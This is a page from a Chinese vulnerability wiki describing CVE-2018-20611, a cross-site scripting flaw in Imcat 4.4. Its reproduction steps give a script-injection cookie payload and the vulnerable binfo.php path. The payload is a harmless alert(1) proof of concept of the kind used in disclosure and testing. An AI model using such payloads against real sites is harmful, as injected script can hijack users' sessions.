menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Imcat chevron_right _(CVE-2018-20611)Imcat 4.4 xss .md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    _(CVE-2018-20611)Imcat 4.4 xss .md
    741 B / 2021-04-21 09:23:46
        (CVE-2018-20611)Imcat 4.4 xss
    ===============================
    
    一、漏洞简介
    ------------
    
    imcat是一套基于PHP的开源建站系统。 imcat
    4.4版本存在跨站脚本漏洞。远程攻击者可通过向root/tools/adbug/binfo.php?cookie
    URI发送特制的cookie利用该漏洞注入任意的Web脚本或HTML。
    
    二、漏洞影响
    ------------
    
    imcat 4.4
    
    三、复现过程
    ------------
    
    将cookie的值修改成
    
        "><script>alert(1)</script>
    
    ![](./resource/(CVE-2018-20611)Imcat4.4xss/media/rId24.png)
    
    然后访问
    
        http://www.0-sec.org/root/tools/adbug/binfo.php?cookie`
    
    ![](./resource/(CVE-2018-20611)Imcat4.4xss/media/rId25.png)
    
    参考链接
    --------
    
    > <https://github.com/AvaterXXX/CVEs/blob/master/imcat.md>
    
    
    links
    file_download